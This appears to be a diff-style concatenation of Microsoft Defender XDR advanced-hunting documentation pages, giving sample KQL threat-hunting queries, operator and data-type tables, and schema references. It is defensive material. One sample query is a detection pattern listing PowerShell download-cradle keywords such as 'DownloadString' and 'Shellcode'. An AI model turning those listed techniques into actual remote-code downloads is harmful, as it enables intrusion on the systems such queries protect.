-//Show only pertinent info, such as account name, the app or service, protocol, the accessed device, and type of logon
-| project AccountDisplayName, TargetAccountSid, Application, Protocol, DeviceName, LogonType
-```
-
-### Check if files from a known malicious sender are on your devices
-
-Assuming you know of an email address sending malicious files (`MaliciousSender@example.com`), you can run this query to determine if files from this sender exist on your devices. You can use this query, for example, to identify devices affected by a malware distribution campaign.
-
-```kusto
-EmailAttachmentInfo
-| where SenderFromAddress =~ "MaliciousSender@example.com"
-//Get emails with attachments identified by a SHA-256
-| where isnotempty(SHA256)
-| join (
-//Check devices for any activity involving the attachments
-DeviceFileEvents
-| project FileName, SHA256, DeviceName, DeviceId
-) on SHA256
-| project Timestamp, FileName , SHA256, DeviceName, DeviceId, NetworkMessageId, SenderFromAddress, RecipientEmailAddress
-```
-
-### Review logon attempts after receipt of malicious emails
-
-This query finds the 10 latest logons performed by email recipients within 30 minutes after they received known malicious emails. You can use this query to check whether the accounts of the email recipients have been compromised.
-
-```kusto
-//Define new table for malicious emails
-let MaliciousEmails=EmailEvents
-//List emails detected as malware, getting only pertinent columns
-| where ThreatTypes has "Malware"
-| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0]);
-MaliciousEmails
-| join (
-//Merge malicious emails with logon events to find logons by recipients
-IdentityLogonEvents
-| project LogonTime = Timestamp, AccountName, DeviceName
-) on AccountName
-//Check only logons within 30 minutes of receipt of an email
-| where (LogonTime - TimeEmail) between (0min.. 30min)
-| take 10
-```
-
-### Review PowerShell activities after receipt of emails from known malicious sender
-
-Malicious emails often contain documents and other specially crafted attachments that run PowerShell commands to deliver additional payloads. If you are aware of emails coming from a known malicious sender (`MaliciousSender@example.com`), you can use this query to list and review PowerShell activities that occurred within 30 minutes after an email was received from the sender.
-
-```kusto
-//Define new table for emails from specific sender
-let EmailsFromBadSender=EmailEvents
-| where SenderFromAddress =~ "MaliciousSender@example.com"
-| project TimeEmail = Timestamp, Subject, SenderFromAddress, AccountName = tostring(split(RecipientEmailAddress, "@")[0]);
-//Merge emails from sender with process-related events on devices
-EmailsFromBadSender
-| join (
-DeviceProcessEvents
-//Look for PowerShell activity
-| where FileName =~ "powershell.exe"
-//Add line below to check only events initiated by Outlook
-//| where InitiatingProcessParentFileName =~ "outlook.exe"
-| project TimeProc = Timestamp, AccountName, DeviceName, InitiatingProcessParentFileName, InitiatingProcessFileName, FileName, ProcessCommandLine
-) on AccountName
-//Check only PowerShell activities within 30 minutes of receipt of an email
-| where (TimeProc - TimeEmail) between (0min.. 30min)
-```
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Query History https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-history.md
- Title: Rerun queries in query history
-description: Learn about the query history tab in advanced hunting
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 01/02/2024--
-# Rerun queries in query history
--
-**Applies to:**
-- Microsoft Defender XDR-
-> [!IMPORTANT]
-> Some information relates to prereleased product which may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.
-
-Your previous queries appear in the **Query history** tab in the lower half of the advanced hunting page. You can run queries you have generated and run before even if you have already closed the query tab that contains it.
-
-## View the query history tab
-
-To view your query history, select the **Query history** tab.
--
-Your recent queries appear in descending order of when you last ran them. The query history contains up to 30 queries from the last 28 days.
-
-By default, **Query history** contains following columns:
-- Time - when the query was started-- Query -- Query time - how long the query ran-- State - whether the query was completed, failed, or was throttled-
-Select **Customize columns** to hide any of the columns in your view.
---
-## Rerun queries from query history
-
-To use any of your previous queries, select the query. The **Run query** and **Use in editor** options then appear.
--
-Select **Run query** to load and run the query in the query editor. Select **Use in editor** to load the query in the editor, where you can then refine it further.
-
security Advanced Hunting Query Language https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-language.md
- Title: Learn the advanced hunting query language in Microsoft Defender XDR
-description: Create your first threat hunting query and learn about common operators and other aspects of the advanced hunting query language
--
- - NOCSH
----
- - m365-security
- - m365initiative-m365-defender
- - tier1
- Previously updated : 03/28/2024--
-# Learn the advanced hunting query language
--
-**Applies to:**
--- Microsoft Defender XDR-
-Advanced hunting is based on the [Kusto query language](/azure/kusto/query/). You can use Kusto operators and statements to construct queries that locate information in a specialized [schema](advanced-hunting-schema-tables.md).
-
-Watch this short video to learn some handy Kusto query language basics.
-
-> [!VIDEO https://www.microsoft.com/en-us/videoplayer/embed/RWRwfJ]
-
-To understand these concepts better, run your first query.
-
-## Try your first query
-
-In the Microsoft Defender portal, go to **Hunting** to run your first query. Use the following example:
-
-```kusto
-// Finds PowerShell execution events that could involve a download
-union DeviceProcessEvents, DeviceNetworkEvents
-| where Timestamp > ago(7d)
-// Pivoting on PowerShell processes
-| where FileName in~ ("powershell.exe", "powershell_ise.exe")
-// Suspicious commands
-| where ProcessCommandLine has_any("WebClient",
- "DownloadFile",
- "DownloadData",
- "DownloadString",
-"WebRequest",
-"Shellcode",
-"http",
-"https")
-| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
-FileName, ProcessCommandLine, RemoteIP, RemoteUrl, RemotePort, RemoteIPType
-| top 100 by Timestamp
-```
-
-**[Run this query in advanced hunting](https://security.microsoft.com/hunting?query=H4sIAAAAAAAEAI2TW0sCURSF93PQfxh8Moisp956yYIgQtLoMaYczJpbzkkTpN_et_dcdPQkcpjbmrXXWftyetKTQG5lKqmMpeB9IJksJJKZDOWdZ8wKeP5wvcm3OLgZbMXmXCmIxjnYIfcAVgYvRi8w3TnfsXEDGAG47pCCZXyP5ViO4KeNbt-Up-hEuJmB6lvButnY8XSL-cDl0M2I-GwxVX8Fe2H5zMzHiKjEVB0eEsnBrszfBIWuXOLrxCJ7VqEBfM3DWUYTkNKrv1p5y3X0jwetemzOQ_NSVuuXZ1c6aNTKRaN8VvWhY9n7OS-o6J5r7mYeQypdEKc1m1qfiqpjCSuspsDntt2J61bEvTlXls5AgQfFl5bHM_gr_BhO2RF1rztoBv2tWahrso_TtzkL93KGMGZVr2pe7eWR-xeZl91f_113UOsx3nDR4Y9j5R6kaCq8ajr_YWfFeedsd27L7it-Z6dAZyxsJq1d9-2ZOSzK3y2NVd8-zUPjtZaJnYsIH4Md7AmdeAcd2Cl1XoURc5PzXlfU8U9P54WcswL6t_TW9Q__qX-xygQAAA&runQuery=true&timeRangeId=week)**
-
-### Describe the query and specify the tables to search
-
-A short comment has been added to the beginning of the query to describe what it is for. This comment helps if you later decide to save the query and share it with others in your organization.
-
-```kusto
-// Finds PowerShell execution events that could involve a download
-```
-
-The query itself will typically start with a table name followed by several elements that start with a pipe (`|`). In this example, we start by creating a union of two tables, `DeviceProcessEvents` and `DeviceNetworkEvents`, and add piped elements as needed.
-
-```kusto
-union DeviceProcessEvents, DeviceNetworkEvents
-```
-
-### Set the time range
-
-The first piped element is a time filter scoped to the previous seven days. Limiting the time range helps ensure that queries perform well, return manageable results, and don't time out.
-
-```kusto
-| where Timestamp > ago(7d)
-```
-> [!NOTE]
-> Kusto time filters are in UTC regardless of the timezone you specified in your [settings](m365d-time-zone.md).
--
-### Check specific processes
-
-The time range is immediately followed by a search for process file names representing the PowerShell application.
-
-```kusto
-// Pivoting on PowerShell processes
-| where FileName in~ ("powershell.exe", "powershell_ise.exe")
-```
-
-### Search for specific command strings
-
-Afterwards, the query looks for strings in command lines that are typically used to download files using PowerShell.
-
-```kusto
-// Suspicious commands
-| where ProcessCommandLine has_any("WebClient",
- "DownloadFile",
- "DownloadData",
- "DownloadString",
- "WebRequest",
- "Shellcode",
- "http",
- "https")
-```
-
-### Customize result columns and length
-
-Now that your query clearly identifies the data you want to locate, you can define what the results look like. `project` returns specific columns, and `top` limits the number of results. These operators help ensure the results are well-formatted and reasonably large and easy to process.
-
-```kusto
-| project Timestamp, DeviceName, InitiatingProcessFileName, InitiatingProcessCommandLine,
-FileName, ProcessCommandLine, RemoteIP, RemoteUrl, RemotePort, RemoteIPType
-| top 100 by Timestamp
-```
-
-Select **Run query** to see the results.
-
-> [!TIP]
-> You can view query results as charts and quickly adjust filters. For guidance, [read about working with query results](advanced-hunting-query-results.md)
-
-## Learn common query operators
-
-You've just run your first query and have a general idea of its components. It's time to backtrack slightly and learn some basics. The Kusto query language used by advanced hunting supports a range of operators, including the following common ones.
-
-| Operator | Description and usage |
-|--|--|
-| `where` | Filter a table to the subset of rows that satisfy a predicate. |
-| `summarize` | Produce a table that aggregates the content of the input table. |
-| `join` | Merge the rows of two tables to form a new table by matching values of the specified column(s) from each table. Watch [Joining tables in KQL](https://www.youtube.com/watch?v=8qZx7Pp5XgM) to learn how.|
-| `count` | Return the number of records in the input record set. |
-| `top` | Return the first N records sorted by the specified columns. |
-| `limit` | Return up to the specified number of rows. |
-| `project` | Select the columns to include, rename or drop, and insert new computed columns. |
-| `extend` | Create calculated columns and append them to the result set. |
-| `makeset` | Return a dynamic (JSON) array of the set of distinct values that Expr takes in the group. |
-| `find` | Find rows that match a predicate across a set of tables. |
-
-To see a live example of these operators, run them from the **Get started** section in advanced hunting.
-
-## Understand data types
-
-Advanced hunting supports Kusto data types, including the following common types:
-
-| Data type | Description and query implications |
-|--|--|
-| `datetime` | Data and time information typically representing event timestamps. [See supported datetime formats](/azure/data-explorer/kusto/query/scalar-data-types/datetime) |
-| `string` | Character string in UTF-8 enclosed in single quotes (`'`) or double quotes (`"`). [Read more about strings](/azure/data-explorer/kusto/query/scalar-data-types/string) |
-| `bool` | This data type supports `true` or `false` states. [See supported literals and operators](/azure/data-explorer/kusto/query/scalar-data-types/bool) |
-| `int` | 32-bit integer |
-| `long` | 64-bit integer |
-
-To learn more about these data types, [read about Kusto scalar data types](/azure/data-explorer/kusto/query/scalar-data-types/).
-
-## Get help as you write queries
-
-Take advantage of the following functionality to write queries faster:
--- **Autosuggest**ΓÇöas you write queries, advanced hunting provides suggestions from IntelliSense.-- **Schema tree**ΓÇöa schema representation that includes the list of tables and their columns is provided next to your working area. For more information, hover over an item. Double-click an item to insert it to the query editor.-- **[Schema reference](advanced-hunting-schema-tables.md#get-schema-information-in-the-security-center)**ΓÇöin-portal reference with table and column descriptions as well as supported event types (`ActionType` values) and sample queries-
-## Work with multiple queries in the editor
-
-You can use the query editor to experiment with multiple queries. To use multiple queries:
--- Separate each query with an empty line.-- Place the cursor on any part of a query to select that query before running it. This will run only the selected query. To run another query, move the cursor accordingly and select **Run query**.--
-For a more efficient workspace, you can also use multiple tabs in the same hunting page. Select **New query** to open a tab for your new query.
--
-You can then run different queries without ever opening a new browser tab.
--
-> [!NOTE]
-> Using multiple browser tabs with advanced hunting might cause you to lose your unsaved queries. To prevent this from happening, use the tab feature within advanced hunting instead of separate browser tabs.
-
-## Use sample queries
-
-The **Get started** section provides a few simple queries using commonly used operators. Try running these queries and making small modifications to them.
--
-> [!NOTE]
-> Apart from the basic query samples, you can also access [shared queries](advanced-hunting-shared-queries.md) for specific threat hunting scenarios. Explore the shared queries on the left side of the page or the [GitHub query repository](https://aka.ms/hunting-queries).
-
-## Access query language documentation
-
-For more information on Kusto query language and supported operators, see [Kusto query language documentation](/azure/kusto/query/).
-
-> [!NOTE]
-> Some tables in this article might not be available in Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Query Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-query-results.md
- Title: Work with advanced hunting query results in Microsoft Defender XDR
-description: Make the most of the query results returned by advanced hunting in Microsoft Defender XDR
--
- - NOCSH
----
- - m365-security
- - tier1
- Previously updated : 02/16/2024--
-# Work with advanced hunting query results
--
-**Applies to:**
-- Microsoft Defender XDR--
-While you can construct your [advanced hunting](advanced-hunting-overview.md) queries to return precise information, you can also work with the query results to gain further insight and investigate specific activities and indicators. You can take the following actions on your query results:
--- View results as a table or chart-- Export tables and charts-- Drill down to detailed entity information-- Tweak your queries directly from the results-
-## View query results as a table or chart
-
-By default, advanced hunting displays query results as tabular data. You can also display the same data as a chart. Advanced hunting supports the following views:
-
-| View type | Description |
-|--|--|
-| **Table** | Displays the query results in tabular format |
-| **Column chart** | Renders a series of unique items on the x-axis as vertical bars whose heights represent numeric values from another field |
-| **Pie chart** | Renders sectional pies representing unique items. The size of each pie represents numeric values from another field. |
-| **Line chart** | Plots numeric values for a series of unique items and connects the plotted values |
-| **Scatter chart** | Plots numeric values for a series of unique items |
-| **Area chart** | Plots numeric values for a series of unique items and fills the sections below the plotted values |
-| **Stacked area chart** | Plots numeric values for a series of unique items and stacks the filled sections below the plotted values |
-| **Time chart** | Plots values by count on a linear time scale |
-
-### Construct queries for effective charts
-
-When rendering charts, advanced hunting automatically identifies columns of interest and the numeric values to aggregate. To get meaningful charts, construct your queries to return the specific values you want to see visualized. Here are some sample queries and the resulting charts.
-
-#### Alerts by severity
-
-Use the `summarize` operator to obtain a numeric count of the values you want to chart. The query below uses the `summarize` operator to get the number of alerts by severity.
-
-```kusto
-AlertInfo
-| summarize Total = count() by Severity
-```
-
-When rendering the results, a column chart displays each severity value as a separate column:
--
-```kusto
-AlertInfo
-| summarize Total = count() by Severity
-| render columnchart
-```
--
-#### Phishing emails across top ten sender domains
-
-If you're dealing with a list of values that isn't finite, you can use the `Top` operator to chart only the values with the most instances. For example, to get the top 10 sender domains with the most phishing emails, use the query below:
-
-```kusto
-EmailEvents
-| where ThreatTypes has "Phish"
-| summarize Count = count() by SenderFromDomain
-| top 10 by Count
-```
-
-Use the pie chart view to effectively show distribution across the top domains:
---
-#### File activities over time
-Using the `summarize` operator with the `bin()` function, you can check for events involving a particular indicator over time. The query below counts events involving the file `invoice.doc` at 30-minute intervals to show spikes in activity related to that file:
-
-```kusto
-CloudAppEvents
-| union DeviceFileEvents
-| where FileName == "invoice.doc"
-| summarize FileCount = count() by bin(Timestamp, 30m)
-```
-
-The line chart below clearly highlights time periods with more activity involving `invoice.doc`:
---
-## Export tables and charts
-
-After running a query, select **Export** to save the results to local file. Your chosen view determines how the results are exported:
--- **Table view**ΓÇöThe query results are exported in tabular form as a Microsoft Excel workbook-- **Any chart**ΓÇöThe query results are exported as a JPEG image of the rendered chart-
-## Drill down from query results
-
-You can also explore the results in-line with the following features:
-- Expand a result by selecting the dropdown arrow at the left of each result-- Where applicable, expand details for results that are in JSON and array formats by selecting the dropdown arrow at the left of applicable column names for added readability-- Open the side pane to see a record's details (concurrent with expanded rows)----
-You can also right-click on any result value in a row so that you can use it to add more filters to the existing query or copy the value for use in further investigation.
--
-Furthermore, for JSON and array fields, you can right-click and update the existing query to include or exclude the field, or to extend the field to a new column.
---
-To quickly inspect a record in your query results, select the corresponding row to open the **Inspect record** panel. The panel provides the following information based on the selected record:
--- **Assets**ΓÇöSummarized view of the main assets (mailboxes, devices, and users) found in the record, enriched with available information, such as risk and exposure levels-- **All details**ΓÇöAll the values from the columns in the record--
-To view more information about a specific entity in your query results, such as a machine, file, user, IP address, or URL, select the entity identifier to open a detailed profile page for that entity.
-
-## Tweak your queries from the results
-
-Select the three dots to the right of any column in the **Inspect record** panel. You can use the options to:
--- Explicitly look for the selected value (`==`)-- Exclude the selected value from the query (`!=`)-- Get more advanced operators for adding the value to your query, such as `contains`, `starts with`, and `ends with`--
-> [!NOTE]
-> Some tables in this article might not be available at Microsoft Defender for Endpoint. [Turn on Microsoft Defender XDR](m365d-enable.md) to hunt for threats using more data sources. You can move your advanced hunting workflows from Microsoft Defender for Endpoint to Microsoft Defender XDR by following the steps in [Migrate advanced hunting queries from Microsoft Defender for Endpoint](advanced-hunting-migrate-from-mde.md).
-
-## Related topics
--- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Understand the schema](advanced-hunting-schema-tables.md)-- [Apply query best practices](advanced-hunting-best-practices.md)-- [Custom detections overview](custom-detections-overview.md)
security Advanced Hunting Schema Changes https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-schema-changes.md
- Title: Naming changes in the Microsoft Defender XDR advanced hunting schema
-description: Track and review naming changes tables and columns in the advanced hunting schema
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/16/2024--
-# Advanced hunting schema - Naming changes
---
-**Applies to:**
-- Microsoft Defender XDR--
-The [advanced hunting schema](advanced-hunting-schema-tables.md) is updated regularly to add new tables and columns. In some cases, existing columns names are renamed or replaced to improve the user experience. Refer to this article to review naming changes that could impact your queries.
-
-Naming changes are automatically applied to queries that are saved in Microsoft Defender XDR, including queries used by custom detection rules. You don't need to update these queries manually. However, you will need to update the following queries:
-- Queries that are run using the API-- Queries that are saved elsewhere outside Microsoft Defender XDR-
-## December 2020
-
-| Table name | Original column name | New column name | Reason for change
-|--|--|--|--|
-| [EmailEvents](advanced-hunting-emailevents-table.md) | `FinalEmailAction` | `EmailAction` | Customer feedback |
-| [EmailEvents](advanced-hunting-emailevents-table.md) | `FinalEmailActionPolicy` | `EmailActionPolicy` | Customer feedback |
-| [EmailEvents](advanced-hunting-emailevents-table.md) | `FinalEmailActionPolicyGuid` | `EmailActionPolicyGuid` | Customer feedback |
-
-## January 2021
-
-| Column name | Original value name | New value name | Reason for change
-|--|--|--|--|
-| `DetectionSource` | Defender for Cloud Apps | Microsoft Defender for Cloud Apps | Rebranding |
-| `DetectionSource` | WindowsDefenderAtp| EDR| Rebranding |
-| `DetectionSource` | WindowsDefenderAv | Antivirus | Rebranding |
-| `DetectionSource` | WindowsDefenderSmartScreen | SmartScreen | Rebranding |
-| `DetectionSource` | CustomerTI | Custom TI | Rebranding |
-| `DetectionSource` | OfficeATP | Microsoft Defender for Office 365 | Rebranding |
-| `DetectionSource` | MTP | Microsoft Defender XDR | Rebranding |
-| `DetectionSource` | AzureATP | Microsoft Defender for Identity | Rebranding |
-| `DetectionSource` | CustomDetection | Custom detection | Rebranding |
-| `DetectionSource` | AutomatedInvestigation |Automated investigation | Rebranding |
-| `DetectionSource` | ThreatExperts | Microsoft Threat Experts | Rebranding |
-| `DetectionSource` | 3rd party TI | 3rd Party sensors | Rebranding |
-| `ServiceSource` | Microsoft Defender ATP| Microsoft Defender for Endpoint | Rebranding |
-|`ServiceSource` |Microsoft Threat Protection | Microsoft Defender XDR | Rebranding |
-| `ServiceSource` | Office 365 ATP |Microsoft Defender for Office 365 | Rebranding |
-| `ServiceSource` |Azure ATP |Microsoft Defender for Identity | Rebranding |
-
-`DetectionSource` is available in the [AlertInfo](advanced-hunting-alertinfo-table.md) table. `ServiceSource` is available in the [AlertEvidence](advanced-hunting-alertevidence-table.md) and [AlertInfo](advanced-hunting-alertinfo-table.md) tables.
-
-## February 2021
-
-1. In the [EmailAttachmentInfo](advanced-hunting-emailattachmentinfo-table.md) and [EmailEvents](advanced-hunting-emailevents-table.md) tables, the `MalwareFilterVerdict`and `PhishFilterVerdict` columns have been replaced by the `ThreatTypes` column. The `MalwareDetectionMethod` and `PhishDetectionMethod` columns were also replaced by the `DetectionMethods` column. This streamlining allows us to provide more information under the new columns. The mapping is provided below.
-
- | Table name | Original column name | New column name | Reason for change
- |--|--|--|--|
- | `EmailAttachmentInfo` | `MalwareDetectionMethod` <br> `PhishDetectionMethod` | `DetectionMethods` | Include more detection methods |
- | `EmailAttachmentInfo` | `MalwareFilterVerdict` <br>`PhishFilterVerdict` | `ThreatTypes` | Include more threat types |
- | `EmailEvents` | `MalwareDetectionMethod` <br> `PhishDetectionMethod` | `DetectionMethods` | Include more detection methods |
- | `EmailEvents` | `MalwareFilterVerdict` <br>`PhishFilterVerdict` | `ThreatTypes` | Include more threat types |
--
-2. In the `EmailAttachmentInfo` and `EmailEvents` tables, the `ThreatNames` column was added to give more information about the email threat. This column contains values like Spam or Phish.
-
-3. In the [DeviceInfo](advanced-hunting-deviceinfo-table.md) table, the `DeviceObjectId` column was replaced by the `AadDeviceId` column based on customer feedback.
-
-4. In the [DeviceEvents](advanced-hunting-deviceevents-table.md) table, several ActionType names were modified to better reflect the description of the action. Details of the changes can be found below.
-
- | Table name | Original ActionType name | New ActionType name | Reason for change
- |--|--|--|--|
- | `DeviceEvents` | `UsbDriveMount` | `UsbDriveMounted` | Customer feedback |
- | `DeviceEvents` | `UsbDriveUnmount` | `UsbDriveUnmounted` | Customer feedback |
- | `DeviceEvents` | `WriteProcessMemoryApiCall` | `WriteToLsassProcessMemory` | Customer feedback |
-
-## March 2021
-
-The `DeviceTvmSoftwareInventoryVulnerabilities` table has been deprecated. Replacing it are the `DeviceTvmSoftwareInventory` and `DeviceTvmSoftwareVulnerabilities` tables.
-
-## May 2021
-
-The `AppFileEvents` table has been deprecated. The `CloudAppEvents` table includes information that used to be in the `AppFileEvents` table, along with other activities in cloud services.
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Understand the schema](advanced-hunting-schema-tables.md)
security Advanced Hunting Schema Tables https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-schema-tables.md
- Title: Data tables in the Microsoft Defender XDR advanced hunting schema
-description: Learn about the tables in the advanced hunting schema to understand the data you can run threat hunting queries on.
--
- - NOCSH
------ m365-security-- tier3- Previously updated : 02/16/2024--
-# Understand the advanced hunting schema
--
-**Applies to:**
--- Microsoft Defender XDR--
-The [advanced hunting](advanced-hunting-overview.md) schema is made up of multiple tables that provide either event information or information about devices, alerts, identities, and other entity types. To effectively build queries that span multiple tables, you need to understand the tables and the columns in the advanced hunting schema.
-
-<a name="get-schema-information-in-the-security-center"></a>
-
-## Get schema information
-
-While constructing queries, use the built-in schema reference to quickly get the following information about each table in the schema:
--- **Tables description**ΓÇötype of data contained in the table and the source of that data.-- **Columns**ΓÇöall the columns in the table.-- **Action types**ΓÇöpossible values in the `ActionType` column representing the event types supported by the table. This information is provided only for tables that contain event information.-- **Sample query**ΓÇöexample queries that feature how the table can be utilized.-
-### Access the schema reference
-To quickly access the schema reference, select the **View reference** action next to the table name in the schema representation. You can also select **Schema reference** to search for a table.
--
-## Learn the schema tables
-The following reference lists all the tables in the schema. Each table name links to a page describing the column names for that table. Table and column names are also listed in Microsoft Defender XDR as part of the schema representation on the advanced hunting screen.
-
-| Table name | Description |
-||-|
-| **[AADSignInEventsBeta](advanced-hunting-aadsignineventsbeta-table.md)** | Microsoft Entra interactive and non-interactive sign-ins |
-| **[AADSpnSignInEventsBeta](advanced-hunting-aadspnsignineventsbeta-table.md)** | Microsoft Entra service principal and managed identity sign-ins |
-| **[AlertEvidence](advanced-hunting-alertevidence-table.md)** | Files, IP addresses, URLs, users, or devices associated with alerts |
-| **[AlertInfo](advanced-hunting-alertinfo-table.md)** | Alerts from Microsoft Defender for Endpoint, Microsoft Defender for Office 365, Microsoft Defender for Cloud Apps, and Microsoft Defender for Identity, including severity information and threat categorization |
-| **[BehaviorEntities](advanced-hunting-behaviorentities-table.md)** | Behavior data types in Microsoft Defender for Cloud Apps |
-| **[BehaviorInfo](advanced-hunting-behaviorinfo-table.md)** | Alerts from Microsoft Defender for Cloud Apps |
-| **[CloudAppEvents](advanced-hunting-cloudappevents-table.md)** | Events involving accounts and objects in Office 365 and other cloud apps and services |
-| **[DeviceEvents](advanced-hunting-deviceevents-table.md)** | Multiple event types, including events triggered by security controls such as Microsoft Defender Antivirus and exploit protection |
-| **[DeviceFileCertificateInfo](advanced-hunting-DeviceFileCertificateInfo-table.md)** | Certificate information of signed files obtained from certificate verification events on endpoints |
-| **[DeviceFileEvents](advanced-hunting-devicefileevents-table.md)** | File creation, modification, and other file system events |
-| **[DeviceImageLoadEvents](advanced-hunting-deviceimageloadevents-table.md)** | DLL loading events |
-| **[DeviceInfo](advanced-hunting-deviceinfo-table.md)** | Machine information, including OS information |
-| **[DeviceLogonEvents](advanced-hunting-devicelogonevents-table.md)** | Sign-ins and other authentication events on devices |
-| **[DeviceNetworkEvents](advanced-hunting-devicenetworkevents-table.md)** | Network connection and related events |
-| **[DeviceNetworkInfo](advanced-hunting-devicenetworkinfo-table.md)** | Network properties of devices, including physical adapters, IP and MAC addresses, as well as connected networks and domains |
-| **[DeviceProcessEvents](advanced-hunting-deviceprocessevents-table.md)** | Process creation and related events |
-| **[DeviceRegistryEvents](advanced-hunting-deviceregistryevents-table.md)** | Creation and modification of registry entries |
-| **[DeviceTvmHardwareFirmware](advanced-hunting-devicetvmhardwarefirmware-table.md)** | Hardware and firmware information of devices as checked by Defender Vulnerability Management |
-| **[DeviceTvmInfoGathering](advanced-hunting-devicetvminfogathering-table.md)** | Defender Vulnerability Management assessment events including configuration and attack surface area states |
-| **[DeviceTvmInfoGatheringKB](advanced-hunting-devicetvminfogatheringkb-table.md)** | Metadata for assessment events collected in the `DeviceTvmInfogathering` table|
-| **[DeviceTvmSecureConfigurationAssessment](advanced-hunting-devicetvmsecureconfigurationassessment-table.md)** | Microsoft Defender Vulnerability Management assessment events, indicating the status of various security configurations on devices |
-| **[DeviceTvmSecureConfigurationAssessmentKB](advanced-hunting-devicetvmsecureconfigurationassessmentkb-table.md)** | Knowledge base of various security configurations used by Microsoft Defender Vulnerability Management to assess devices; includes mappings to various standards and benchmarks |
-| **[DeviceTvmSoftwareEvidenceBeta](advanced-hunting-devicetvmsoftwareevidencebeta-table.md)** | Evidence info about where a specific software was detected on a device |
-| **[DeviceTvmSoftwareInventory](advanced-hunting-devicetvmsoftwareinventory-table.md)** | Inventory of software installed on devices, including their version information and end-of-support status |
-| **[DeviceTvmSoftwareVulnerabilities](advanced-hunting-devicetvmsoftwarevulnerabilities-table.md)** | Software vulnerabilities found on devices and the list of available security updates that address each vulnerability |
-| **[DeviceTvmSoftwareVulnerabilitiesKB](advanced-hunting-devicetvmsoftwarevulnerabilitieskb-table.md)** | Knowledge base of publicly disclosed vulnerabilities, including whether exploit code is publicly available |
-| **[EmailAttachmentInfo](advanced-hunting-emailattachmentinfo-table.md)** | Information about files attached to emails |
-| **[EmailEvents](advanced-hunting-emailevents-table.md)** | Microsoft 365 email events, including email delivery and blocking events |
-| **[EmailPostDeliveryEvents](advanced-hunting-emailpostdeliveryevents-table.md)** | Security events that occur post-delivery, after Microsoft 365 delivers the emails to the recipient mailbox |
-| **[EmailUrlInfo](advanced-hunting-emailurlinfo-table.md)** | Information about URLs on emails |
-| **[ExposureGraphEdges](advanced-hunting-exposuregraphedges-table.md)** | Microsoft Security Exposure Management exposure graph edge information provides visibility into relationships between entities and assets in the graph |
-| **[ExposureGraphNodes](advanced-hunting-exposuregraphnodes-table.md)** | Microsoft Security Exposure Management exposure graph node information, about organizational entities and their properties |
-| **[IdentityDirectoryEvents](advanced-hunting-identitydirectoryevents-table.md)** | Events involving an on-premises domain controller running Active Directory (AD). This table covers a range of identity-related events and system events on the domain controller. |
-| **[IdentityInfo](advanced-hunting-identityinfo-table.md)** | Account information from various sources, including Microsoft Entra ID |
-| **[IdentityLogonEvents](advanced-hunting-identitylogonevents-table.md)** | Authentication events on Active Directory and Microsoft online services |
-| **[IdentityQueryEvents](advanced-hunting-identityqueryevents-table.md)** | Queries for Active Directory objects, such as users, groups, devices, and domains |
-| **[UrlClickEvents](advanced-hunting-urlclickevents-table.md)** | Safe Links clicks from email messages, Teams, and Office 365 apps |
-
-## Related topics
-- [Advanced hunting overview](advanced-hunting-overview.md)-- [Learn the query language](advanced-hunting-query-language.md)-- [Work with query results](advanced-hunting-query-results.md)-- [Use shared queries](advanced-hunting-shared-queries.md)-- [Hunt across devices, emails, apps, and identities](advanced-hunting-query-emails-devices.md)-- [Apply query best practices](advanced-hunting-best-practices.md)
security Advanced Hunting Security Copilot https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/advanced-hunting-security-copilot.md
- Title: Microsoft Copilot for Security in advanced hunting
-description: Learn how Microsoft Copilot for Security advanced hunting (NL2KQL) plugin can generate a KQL query for you.
--
- - NOCSH
----
- - m365-security
- - tier1
- - security-copilot
- Previously updated : 04/01/2024--
-# Microsoft Copilot for Security in advanced hunting
--
-**Applies to:**
--- Microsoft Defender-- Microsoft Defender XDR-
-## Copilot for Security in advanced hunting
-
-[Microsoft Copilot for Security in Microsoft Defender](security-copilot-in-microsoft-365-defender.md) comes with a query assistant capability in advanced hunting.
-
-Threat hunters or security analysts who are not yet familiar with or have yet to learn KQL can make a request or ask a question in natural language (for instance, *Get all alerts involving user admin123*). Copilot for Security then generates a KQL query that corresponds to the request using the advanced hunting data schema.
-
-This feature reduces the time it takes to write a hunting query from scratch so that threat hunters and security analysts can focus on hunting and investigating threats.
-
-Users with access to Copilot for Security have access to this capability in advanced hunting.
-
-> [!NOTE]
